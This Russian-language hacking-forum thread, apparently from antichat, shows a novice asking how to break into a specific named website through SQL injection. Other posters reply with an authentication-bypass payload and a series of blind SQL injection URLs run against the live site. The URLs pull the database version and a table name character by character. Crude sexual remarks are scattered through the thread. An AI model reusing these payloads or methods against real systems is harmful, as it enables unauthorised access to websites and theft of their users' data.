есть сайт
http://wblist.ru/t3/
короче как произвести sql инъякцию на нем?
====================================
я накопал
username передается при помощи GET
http://wblist.ru/t3/handler.php?username=(значения вводимое в поле с паролем)
а пароль как ни странно вводиться который приходит в ответном смс!
короче не знаю что дальше делать!
BlackCats написал что он ломал этот сайт, но он уехал и не хочет мне ничего рассказывать!

Так что пипл помогите не знаю что дальше делать!

класнные сиськи

В запросе к серваку он зачем-то передает мой cookies со значением phpsessid для чего интеррсно!

Что-то я запутался!
Выручайте молодняк!

http://wblist.ru/t3/ajax.js
очень интересная функция function handleResponse() ,как подминить результат?
вообще возможно?
если не хотите помогать хотя бы скажите правильно ли я думаю?

Тебе какбы извесно о форуме за пределами болталки?
http://forum.antichat.ru/threadedpost1423315.html#post1423315
да известно, но вдруг админы сочтут ,что я нарушаю правила и забанят? вот и решил в болталке написать.

ну я зелённый,перечитал форум решил попробывать свои силы!

Понятно, молодец тогда.
Ты помочь не можешь?

А мне кажется что сайт разводка...:) Ни каких секретов нет, а на счёт взлома фермера на ачате много инфы... :)

Вместо пароля с SMS введи
a' OR 1=1/*
получишь нужную херню

Слушай BlackSun,а можешь рассшифровать?

ну я зелённый,перечитал форум решил попробывать свои силы!

Слушай BlackSun,а можешь рассшифровать?
омг

%63%61%20%65%30%20%65%61%20%32%30%20%65%32%20%66%6 2%20%32%63%20%32%30%20%65%31%20%65%62%20%66%66%20% 66%32%20%66%63%20%32%63%20%32%30%20%65%37%20%65%30 %20%65%35%20%65%31%20%65%30%20%65%62%20%65%38%20%3 2%63%20%32%30%20%66%35%20%65%65%20%66%32%20%66%63% 20%32%30%20%65%31%20%66%62%20%32%30%20%65%61%20%66 %32%20%65%65%20%32%30%20%65%31%20%65%30%20%66%38%2 0%65%61%20%65%65%20%65%39%20%32%30%20%65%66%20%65% 65%20%65%34%20%66%33%20%65%63%20%65%30%20%65%62

%63%61%20%65%30%20%65%61%20%32%30%20%65%32%20%66%6 2%20%32%63%20%32%30%20%65%31%20%65%62%20%66%66%20% 66%32%20%66%63%20%32%63%20%32%30%20%65%37%20%65%30 %20%65%35%20%65%31%20%65%30%20%65%62%20%65%38%20%3 2%63%20%32%30%20%66%35%20%65%65%20%66%32%20%66%63% 20%32%30%20%65%31%20%66%62%20%32%30%20%65%61%20%66 %32%20%65%65%20%32%30%20%65%31%20%65%30%20%66%38%2 0%65%61%20%65%65%20%65%39%20%32%30%20%65%66%20%65% 65%20%65%34%20%66%33%20%65%63%20%65%30%20%65%62
Я не в теме!
ты расшифровать можешь каким,что значит a' OR 1=1/*
это Javascript?
только по русски

/me в ужосе схватился за голову
нет слов...

А почему именно 1=1 а не например другой символ=1?
я проверил если 1=0 то пароль не верный!
а что это за язык тут используется?

язык SQL
вбей в поле пароль 'OR 1/* и забанься на форуме, тебеж всё уже сказали

по твоему 1=0 верное сравнение?)

2TC

https://forum.antichat.ru/threadnav43966-1-10.html

и вообще что-то гон тут уже пошол

5 версия
http://wblist.ru/t3/handler.php?username=a'+OR+substring(version(),1,1 )=5/*
давайте хекнем? :)

Спачибо пипл!
Админы тему можно закрыть!

http://wblist.ru/t3/handler.php?username=a'+OR+((SELECT%20table_name%2 0FROM%20information_schema.tables%20LIMIT%2015,1)= 'VIEWS')/*
знач 16 уже идёт табла чо нам нужна, пойду подбирать...
Да, я неумею юзать проги для слепых скулей :(

http://wblist.ru/t3/handler.php?username=a'+OR+(SELECT+LENGTH(table_na me)+FROM+information_schema.tables+LIMIT+16,1)=5/*
5 символов в имени таблы

http://wblist.ru/t3/handler.php?username=a'+OR+ASCII(SUBSTRING((SELECT %20table_name%20FROM%20information_schema.tables%2 0LIMIT%2016,1),1,1))=102/*
f****

http://wblist.ru/t3/handler.php?username=a'+OR+ASCII(SUBSTRING((SELECT %20table_name%20FROM%20information_schema.tables%2 0LIMIT%2016,1),2,1))=105/*

fi***

http://wblist.ru/t3/handler.php?username=a'+OR+ASCII(SUBSTRING((SELECT %20table_name%20FROM%20information_schema.tables%2 0LIMIT%2016,1),3,1))=111/*
fio**

http://wblist.ru/t3/handler.php?username=a'+OR+ASCII(SUBSTRING((SELECT %20table_name%20FROM%20information_schema.tables%2 0LIMIT%2016,1),4,1))=105/*
fioi*

http://wblist.ru/t3/handler.php?username=a'+OR+ASCII(SUBSTRING((SELECT %20table_name%20FROM%20information_schema.tables%2 0LIMIT%2016,1),5,1))=113/*
табла fioiq, эмм... :confused:

не, точно fioiq
http://wblist.ru/t3/handler.php?username=a'+OR+((SELECT%20table_name%2 0FROM%20information_schema.tables%20LIMIT%2016,1)= 'fioiq')/*
Ну нафик, с такими таблами... пойду дальше работать :)
==
ТС, ты ещё тут? Как мозг? :D

тут были сиськи

и пиписки

Я плакать... Форма отправки коммента :) xD
<input class=“input-text” type=“text” value="Имя"/>
<input class=“input-text” type=“text” value="Отзыв"/>
<input class=“input-text” type=“text” value="Фото (url)"/>
<FORM>
<input TYPE="button" VALUE=" Отправить " ONCLICK="HomeButton()"> <script>
function HomeButton()
{
location.href="http://wblist.ru/t3";
}
</script>

о_О и отправляет?

Я сначала подумал, что Green Member'у нужна помощь в проведении скули :-DD

Я сначала подумал, что Green Member'у нужна помощь в проведении скули :-DD
Аналагична.Я уже прбежал как главный реподрочер за гrинкой :D

http://forum.antichat.ru/showpost.php?p=1424335&postcount=10326

И никаких блиндов не надо...

поигрались?
ТЕПЕРЬ
http://img.liveinternet.ru/images/attach/3/9223/9223625_1527595.jpg

вышло обновление